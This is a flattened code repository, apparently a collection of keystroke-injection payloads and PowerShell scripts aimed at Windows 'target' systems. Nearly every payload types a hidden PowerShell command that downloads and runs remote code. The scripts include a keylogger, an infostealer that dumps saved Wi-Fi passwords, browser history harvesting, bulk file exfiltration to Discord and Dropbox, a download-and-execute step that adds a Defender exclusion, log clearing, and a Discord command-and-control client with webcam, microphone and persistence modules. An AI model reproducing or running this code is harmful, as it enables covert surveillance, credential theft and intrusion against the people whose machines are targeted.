17 | 'opera_history' = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\History" 18 | 'opera_bookmarks' = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\Bookmarks" 19 | } 20 | 21 | # Define browsers and data 22 | $Browsers = @('chrome', 'edge', 'firefox', 'opera') 23 | $DataValues = @('history', 'bookmarks') 24 | 25 | foreach ($Browser in $Browsers) { 26 | foreach ($DataValue in $DataValues) { 27 | $PathKey = "${Browser}_${DataValue}" 28 | $Path = $Paths[$PathKey] 29 | 30 | $Value = Get-Content -Path $Path | Select-String -AllMatches $regex | % {($_.Matches).Value} | Sort -Unique 31 | 32 | $Value | ForEach-Object { 33 | [PSCustomObject]@{ 34 | Browser = $Browser 35 | DataType = $DataValue 36 | Content = $_ 37 | } 38 | } | Out-File -FilePath $outpath -Append 39 | } 40 | } 41 | 42 | curl.exe -F file1=@"$outPath" $whuri | Out-Null 43 | sleep 2 44 | Remove-Item -Path $outPath -force 45 | -------------------------------------------------------------------------------- /Fast-Execution/Clean-History/Clean-History.js: -------------------------------------------------------------------------------- 1 | // Title: History Cleaner 2 | // Author: @beigeworm 3 | // Description: This script empties the temp folder and recycle bin, clear run box and powershell history 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Clean-History/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | 17 | -------------------------------------------------------------------------------- /Fast-Execution/Clean-History/README.md: -------------------------------------------------------------------------------- 1 | 2 |

History Cleaner

3 | 4 | SYNOPSIS 5 | Empty the temp folder and recycle bin, clear run box and powershell history. 6 | 7 | USAGE 8 | 1. Run the script 9 | 10 | CREDIT 11 | this code was pulled from I-Am-Jakoby's recon script. 12 | 13 | #> 14 | -------------------------------------------------------------------------------- /Fast-Execution/Clean-History/main.ps1: -------------------------------------------------------------------------------- 1 | # Delete contents of Temp folder 2 | 3 | rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue 4 | 5 | # Delete run box history 6 | 7 | reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 8 | 9 | # Delete powershell history 10 | 11 | Remove-Item (Get-PSreadlineOption).HistorySavePath 12 | 13 | # Deletes contents of recycle bin 14 | 15 | Clear-RecycleBin -Force -ErrorAction SilentlyContinue -------------------------------------------------------------------------------- /Fast-Execution/Computer-Acid/Computer-ACID-Prank.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's GDI Effects Prank. 2 | // Author: @beigeworm 3 | // Description: This script uses GDI effects on the users display to create visual effects for 90 seconds. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Computer-Acid/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | 17 | -------------------------------------------------------------------------------- /Fast-Execution/Computer-Acid/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Computer Acid Prank

3 | 4 | SYNOPSIS 5 | 6 | this script generates GDI effects (VISUAL EFFECTS) on the desktop 7 | (lasts for 90 seconds before returning to normal) 8 | 9 | USAGE 10 | 11 | 1. Run script with powershell -------------------------------------------------------------------------------- /Fast-Execution/Discord-C2/Discord C2 Client.js: -------------------------------------------------------------------------------- 1 | 2 | // Title: beigeworm's Discord Command And Control. 3 | // Author: @beigeworm 4 | // Description: Using a Discord Server Chat and a github text file to Act as a Command and Control Platform. 5 | // Target: Windows 10 and 11 6 | // SETUP 7 | // Goto https://pastebin.com and make an account.. 8 | // Create an empty paste/file and copy the RAW url. 9 | // Change PASTEBIN_URL_HERE to the RAW url eg. https://pastebin.com/raw/QeCLTdea -OR- http://your.server.ip.here/files/file.txt 10 | // Change WEBHOOK_HERE to your webhook eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx 11 | // for more info goto - https://github.com/beigeworm/PoshCord-C2 12 | 13 | // script setup 14 | layout("us") 15 | 16 | // Open Powershell 17 | delay(1000); 18 | press("GUI r"); 19 | delay(1000); 20 | type("powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://is.gd/bwdcc2 | iex"); 21 | press("ENTER"); 22 | -------------------------------------------------------------------------------- /Fast-Execution/Discord-C2/README.md: -------------------------------------------------------------------------------- 1 | # PoshCord-C2 2 | 3 | MAIN SCRIPT HERE - https://github.com/beigeworm/PoshCord-C2 4 | 5 | **SYNOPSIS** 6 | 7 | Using a Discord webhook and a hosted text file to Act as a Command and Control Platform. 8 | 9 | **INFORMATION** 10 | 11 | This script will wait until it notices a change in the contents of a text file hosted online (eg. github/pastebin). 12 | Every 10 seconds it will check a file for a change in the file contents and interpret it as a custom command / module. 13 | 14 | *Using github to host your command file will take up to 5 minutes to run each module command - Use pastebin (account needed) OR your own server to host the txt file for instant response* 15 | 16 | **SETUP** 17 | 1. Goto https://pastebin.com and make an account.. 18 | 2. Create an empty paste/file and copy the RAW url. 19 | 3. Change YOUR_FILE_URL to the RAW url eg. https://pastebin.com/QeCLTdea -OR- http://your.server.ip.here/files/file.txt 20 | 4. Change YOUR_WEBHOOK_URL to your webhook eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx 21 | 22 | **USAGE** 23 | 1. Setup the script 24 | 2. Run the script on a target. 25 | 3. Check discord for 'waiting to connect..' message. 26 | 4. Edit the contents of your hosted file to contain 'options' to get a list of modules 27 | 5. Do the same with any other command listed - To run that module. 28 | 29 | **MODULES** 30 | 1. `Message` : Send a message window to the Users desktop. 31 | 2. `SpeechToText` : Send microphone audio transcript to Discord 32 | 3. `Screenshot` : Sends a screenshot of the desktop to Discord. 33 | 4. `KeyCapture` : Capture Keystrokes and send to Discord. (see ExtraInfo for usage.) 34 | 5. `Exfiltrate` : Send various files to Discord zipped in 25mb files. (see ExtraInfo for usage.) 35 | 6. `Upload` : Upload a file to Discord. (see ExtraInfo for usage.) 36 | 7. `Systeminfo` : Send System information as text file to Discord. (takes a few minutes to gather data) 37 | 8. `RecordAudio` : Record microphone to Discord (RecordAudio -t 100) in seconds 38 | 9. `RecordScreen` : Record Screen to Discord (RecordScreen -t 100) in seconds 39 | 10. `TakePicture` : Send a webcam picture to Discord. (can take a few minutes..) 40 | 11. `FolderTree` : Save folder trees to file and send to Discord. 41 | 12. `FakeUpdate` : Spoof windows update screen. 42 | 13. `Nearby-Wifi` : Show nearby wifi networks 43 | 14. `Send-Hydra` : Never ending popups (use killswitch) 44 | 15. `AddPersistance` : Add this script to the startup folder. 45 | 16. `RemovePersistance` : Remove this script from the startup folder. 46 | 17. `IsAdmin` : Check if the session is admin. 47 | 18. `AttemptElevate` : Attempt to restart script as admin. (displays a UAC prompt to User) 48 | 19. `EnumerateLAN` : Show all devices on the network (see ExtraInfo for usage.) (can take a few miniutes to complete) 49 | 20. `Close` : Close this Session 50 | 21. `Options` : Show the Module menu 51 | 22. `ExtraInfo` : Show extra Module information 52 | 53 | 54 | **FEATURES** 55 | 56 | **Custom Scripting** 57 | 58 | Edit the hosted file contents to any custom powershell script or command to run custom powershell. 59 | 60 | **Killswitch** 61 | 62 | Save a hosted file contents as 'kill' to stop 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands. -------------------------------------------------------------------------------- /Fast-Execution/Discord-Infostealer/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Discord System InfoStealer

3 | 4 | SYNOPSIS 5 | 6 | This script gathers system information and posts to Discord Webhook with the results. 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 4. Replace DISCORD_WEBHOOK with your webhook 11 | 5. Run Script on target System 12 | -------------------------------------------------------------------------------- /Fast-Execution/Discord-Infostealer/System-Info-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's system information to discord webhook 2 | // Author: @beigeworm 3 | // Description: This script gathers system information and posts to a discord webhook address with the results. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_info_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/Discord-Infostealer/main.ps1: -------------------------------------------------------------------------------- 1 | $hookurl = "$dc" 2 | 3 | $userInfo = Get-WmiObject -Class Win32_UserAccount ;$fullName = $($userInfo.FullName) ;$fullName = ("$fullName").TrimStart("") 4 | $email = (Get-ComputerInfo).WindowsRegisteredOwner 5 | $systemLocale = Get-WinSystemLocale;$systemLanguage = $systemLocale.Name 6 | $userLanguageList = Get-WinUserLanguageList;$keyboardLayoutID = $userLanguageList[0].InputMethodTips[0] 7 | $ver = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').DisplayVersion 8 | $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content 9 | $outssid="";$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){ 10 | if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()} 11 | $pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None";foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$outssid+="SSID: $ssid : Password: $pass`n"}}}$a++;} 12 | 13 | $systemInfo = Get-WmiObject -Class Win32_OperatingSystem 14 | $processorInfo = Get-WmiObject -Class Win32_Processor 15 | $computerSystemInfo = Get-WmiObject -Class Win32_ComputerSystem 16 | $userInfo = Get-WmiObject -Class Win32_UserAccount 17 | $videocardinfo = Get-WmiObject Win32_VideoController 18 | $Hddinfo = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, FileSystem,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,FileSystem,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } ;$Hddinfo=($Hddinfo| Out-String) ;$Hddinfo = ("$Hddinfo").TrimEnd("") 19 | $RamInfo = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} 20 | 21 | $users = "$($userInfo.Name)" 22 | $userString = "`nFull Name : $($userInfo.FullName)" 23 | 24 | $OSString = "$($systemInfo.Caption) $($systemInfo.OSArchitecture)" 25 | $systemString = "Processor : $($processorInfo.Name)" 26 | $systemString += "`nMemory : $RamInfo" 27 | $systemString += "`nGpu : $($videocardinfo.Name)" 28 | $systemString += "`nStorage : $Hddinfo" 29 | 30 | $infomessage = "``======================================================== 31 | 32 | Current User : $env:USERNAME 33 | Email Address : $email 34 | Language : $systemLanguage 35 | Keyboard Layout : $keyboardLayoutID 36 | Other Accounts : $users 37 | Public IP : $computerPubIP 38 | Current OS : $OSString 39 | Build : $ver 40 | Hardware Info 41 | -------------------------------------------------------- 42 | $systemString``" 43 | 44 | $COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table 45 | $process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine 46 | $service=Get-CimInstance -ClassName Win32_Service | select State,Name,StartName,PathName | Where-Object {$_.State -like 'Running'} 47 | $software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize 48 | $drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion 49 | $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" 50 | $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique 51 | $Value | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}} 52 | $Regex2 = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Pathed = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History" 53 | $Value2 = Get-Content -Path $Pathed | Select-String -AllMatches $regex2 |% {($_.Matches).Value} |Sort -Unique 54 | $Value2 | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}} 55 | $pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt";$pshistory = Get-Content $pshist -raw 56 | $RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 100 FullName, LastWriteTime 57 | 58 | $outpath = "$env:temp\systeminfo.txt" 59 | "--------------------- SYSTEM INFORMATION for $env:COMPUTERNAME -----------------------`n" | Out-File -FilePath $outpath -Encoding ASCII 60 | "General Info `n $infomessage" | Out-File -FilePath $outpath -Encoding ASCII -Append 61 | "Network Info `n -----------------------------------------------------------------------`n$outssid" | Out-File -FilePath $outpath -Encoding ASCII -Append 62 | "USB Info `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 63 | ($COMDevices| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 64 | "`n" | Out-File -FilePath $outpath -Encoding ASCII -Append 65 | "SOFTWARE INFO `n ======================================================================" | Out-File -FilePath $outpath -Encoding ASCII -Append 66 | "Installed Software `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 67 | ($software| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 68 | "Processes `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 69 | ($process| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 70 | "Services `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 71 | ($service| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 72 | "Drivers `n -----------------------------------------------------------------------`n$drivers" | Out-File -FilePath $outpath -Encoding ASCII -Append 73 | "`n" | Out-File -FilePath $outpath -Encoding ASCII -Append 74 | "HISTORY INFO `n ====================================================================== `n" | Out-File -FilePath $outpath -Encoding ASCII -Append 75 | "Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 76 | ($Value| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 77 | ($Value2| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 78 | "Powershell History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 79 | ($pshistory| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 80 | "Recent Files `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append 81 | ($RecentFiles | Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append 82 | 83 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":computer: ``System Information for $env:COMPUTERNAME`` :computer:"} | ConvertTo-Json 84 | Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys 85 | 86 | Sleep 1 87 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = "$infomessage"} | ConvertTo-Json 88 | Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys 89 | 90 | curl.exe -F file1=@"$outpath" $hookurl 91 | Sleep 1 92 | Remove-Item -Path $outpath -force 93 | -------------------------------------------------------------------------------- /Fast-Execution/Discord-Keylogger/Keylogger-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Keyloggger to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script logs all Keystrokes and posts results to a discord webhook when the keyboard goes inactive for more than 10 secs. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_kl_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | 19 | -------------------------------------------------------------------------------- /Fast-Execution/Discord-Keylogger/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Keylogger To Discord Webhook

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script gathers Keypress information and posts to a discord webhook address with the results only 8 | when the keyboard is inactive for more than 10 seconds and only if keys were pressed before that. 9 | 10 | USAGE 11 | 12 | 1. Input your credentials below 13 | 2. Run Script on target System 14 | 3. Check Discord for results 15 | -------------------------------------------------------------------------------- /Fast-Execution/Discord-Keylogger/main.ps1: -------------------------------------------------------------------------------- 1 | # Import DLL Definitions for keyboard inputs 2 | $API = @' 3 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 4 | public static extern short GetAsyncKeyState(int virtualKeyCode); 5 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 6 | public static extern int GetKeyboardState(byte[] keystate); 7 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 8 | public static extern int MapVirtualKey(uint uCode, int uMapType); 9 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 10 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 11 | '@ 12 | $API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru 13 | 14 | # Add stopwatch for intellegent sending 15 | $LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew() 16 | $KeypressThreshold = [TimeSpan]::FromSeconds(10) 17 | 18 | # Start a continuous loop 19 | While ($true){ 20 | $keyPressed = $false 21 | try{ 22 | # Start a loop that checks the time since last activity before message is sent 23 | while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) { 24 | # Start the loop with 30 ms delay between keystate check 25 | Start-Sleep -Milliseconds 30 26 | for ($asc = 8; $asc -le 254; $asc++){ 27 | # Get the key state. (is any key currently pressed) 28 | $keyst = $API::GetAsyncKeyState($asc) 29 | # If a key is pressed 30 | if ($keyst -eq -32767) { 31 | # Restart the inactivity timer 32 | $keyPressed = $true 33 | $LastKeypressTime.Restart() 34 | $null = [console]::CapsLock 35 | # Translate the keycode to a letter 36 | $vtkey = $API::MapVirtualKey($asc, 3) 37 | # Get the keyboard state and create stringbuilder 38 | $kbst = New-Object Byte[] 256 39 | $checkkbst = $API::GetKeyboardState($kbst) 40 | $logchar = New-Object -TypeName System.Text.StringBuilder 41 | # Define the key that was pressed 42 | if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) { 43 | # Check for non-character keys 44 | $LString = $logchar.ToString() 45 | if ($asc -eq 8) {$LString = "[BKSP]"} 46 | if ($asc -eq 13) {$LString = "[ENT]"} 47 | if ($asc -eq 27) {$LString = "[ESC]"} 48 | # Add the key to sending variable 49 | $send += $LString 50 | } 51 | } 52 | } 53 | } 54 | } 55 | finally{ 56 | If ($keyPressed) { 57 | # Send the saved keys to a webhook 58 | $escmsgsys = $send -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 59 | $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss" 60 | $escmsg = $timestamp+" : "+'`'+$escmsgsys+'`' 61 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsg} | ConvertTo-Json 62 | Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys 63 | #Remove log file and reset inactivity check 64 | $send = "" 65 | $keyPressed = $false 66 | } 67 | } 68 | # reset stopwatch before restarting the loop 69 | $LastKeypressTime.Restart() 70 | Start-Sleep -Milliseconds 10 71 | } 72 | -------------------------------------------------------------------------------- /Fast-Execution/Download-and-Execute/Download-Execute.js: -------------------------------------------------------------------------------- 1 | // Title: Download-Execute from Run Prompt 2 | // Author: @beigeworm | https://github.com/beigeworm 3 | // Description: Uses the Run Prompt to download a file and run it. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace FILE_URL_HERE with the url of your file to run. 7 | 8 | // Open Powershell as Admin 9 | press("GUI r"); 10 | delay(1000); 11 | type("powershell -NoP -Ep Bypass -W H -C cd $env:Temp;Add-MpPreference -ExclusionPath C:/;Start-Sleep 1;iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit"); 12 | delay(500); 13 | press("CONTROL SHIFT ENTER"); 14 | delay(3000); 15 | press("ALT y"); -------------------------------------------------------------------------------- /Fast-Execution/Download-and-Execute/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Download and Execute exe files

3 | 4 | SYNOPSIS 5 | 6 | Uses the Run Prompt to download a file and run it. 7 | 8 | USAGE 9 | 10 | replace FILE_URL_HERE with the url of your file to run. 11 | Run script on target Windows system. 12 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Discord/Exfiltrate-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Exfiltrate files to Discord 2 | // Author: @beigeworm 3 | // Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a Discord Webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='WEBHOOK_HERE'; irm https://is.gd/bw_ex_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script searches the user folders for specific filetypes to upload to Discord zipped. 7 | 8 | SETUP 9 | 10 | Create a webhook in a discord server channel settings. 11 | Replace WEBHOOK_HERE with your webhook. 12 | 13 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $hookurl = "$dc" 2 | 3 | Function Exfiltrate { 4 | 5 | param ([string[]]$FileType,[string[]]$Path) 6 | $maxZipFileSize = 25MB 7 | $currentZipSize = 0 8 | $index = 1 9 | $zipFilePath ="$env:temp/Loot$index.zip" 10 | 11 | If($Path -ne $null){ 12 | $foldersToSearch = "$env:USERPROFILE\"+$Path 13 | }else{ 14 | $foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") 15 | } 16 | 17 | If($FileType -ne $null){ 18 | $fileExtensions = "*."+$FileType 19 | }else { 20 | $fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") 21 | } 22 | 23 | Add-Type -AssemblyName System.IO.Compression.FileSystem 24 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 25 | 26 | foreach ($folder in $foldersToSearch) { 27 | foreach ($extension in $fileExtensions) { 28 | $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse 29 | foreach ($file in $files) { 30 | $fileSize = $file.Length 31 | if ($currentZipSize + $fileSize -gt $maxZipFileSize) { 32 | $zipArchive.Dispose() 33 | $currentZipSize = 0 34 | curl.exe -F file1=@"$zipFilePath" $hookurl 35 | Remove-Item -Path $zipFilePath -Force 36 | Sleep 1 37 | $index++ 38 | $zipFilePath ="$env:temp/Loot$index.zip" 39 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 40 | } 41 | $entryName = $file.FullName.Substring($folder.Length + 1) 42 | [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName) 43 | $currentZipSize += $fileSize 44 | } 45 | } 46 | } 47 | $zipArchive.Dispose() 48 | curl.exe -F file1=@"$zipFilePath" $hookurl 49 | Remove-Item -Path $zipFilePath -Force 50 | Write-Output "$env:COMPUTERNAME : Exfiltration Complete." 51 | } 52 | 53 | Exfiltrate 54 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Dropbox/Exfiltrate-to-Dropbox.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Exfiltrate files to Dropbox 2 | // Author: @beigeworm 3 | // Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DROPBOX_TOKEN with your Dropbox Token. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Exfiltrate-to-Dropbox/main.ps1 | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Dropbox/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to Dropbox

3 | 4 | SYNOPSIS 5 | 6 | Uses Powershell to Exfiltrate all files of all specified filetypes to a DropBox account. 7 | 8 | SETUP 9 | 10 | make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app) 11 | generate an access token for your app and replace DROPBOX_ACCESS_TOKEN_HERE. 12 | 13 | USAGE 14 | 15 | 1. Input your credentials below 16 | 2. Run Script on target System 17 | 3. Check Discord for results 18 | 19 | #> -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Dropbox/main.ps1: -------------------------------------------------------------------------------- 1 | $accessToken = "$db" 2 | $localFolderPath = "$env:USERPROFILE" 3 | 4 | $computerName = "$env:COMPUTERNAME" 5 | $computerNameAsString = $computerName.ToString() 6 | $dropboxCreateFolderUrl = "https://api.dropboxapi.com/2/files/create_folder_v2" 7 | 8 | $dropboxFolderPath = $computerName.ToString() 9 | $dropboxUploadUrl = "https://content.dropboxapi.com/2/files/upload" 10 | 11 | $headers = @{ 12 | "Authorization" = "Bearer $accessToken" 13 | "Content-Type" = "application/octet-stream" 14 | } 15 | $body = @{ 16 | "path" = "/$computerName" 17 | "autorename" = $true 18 | } | ConvertTo-Json 19 | 20 | $files = Get-ChildItem -Path $localFolderPath -Include "*.docx","*.txt","*.pdf","*.jpg","*.png" -Recurse 21 | 22 | foreach ($file in $files) { 23 | $relativePath = $file.FullName.Replace($localFolderPath, '').TrimStart('\') 24 | $dropboxFilePath = "$dropboxFolderPath/$relativePath".Replace('\', '/') 25 | $headers["Dropbox-API-Arg"] = "{`"path`": `"/$dropboxFilePath`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}" 26 | try { 27 | $fileBytes = [System.IO.File]::ReadAllBytes($file.FullName) 28 | $response = Invoke-RestMethod -Uri $dropboxUploadUrl -Method Post -Headers $headers -Body $fileBytes 29 | } 30 | catch {} 31 | } 32 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Exfiltrate files to Telegram 2 | // Author: @beigeworm 3 | // Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace TELEGRAM_TOKEN with your Telegram Token. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Exfiltrate-to-Telegram/main.ps1 | iex"); 16 | delay(500); 17 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Telegram/README.md: 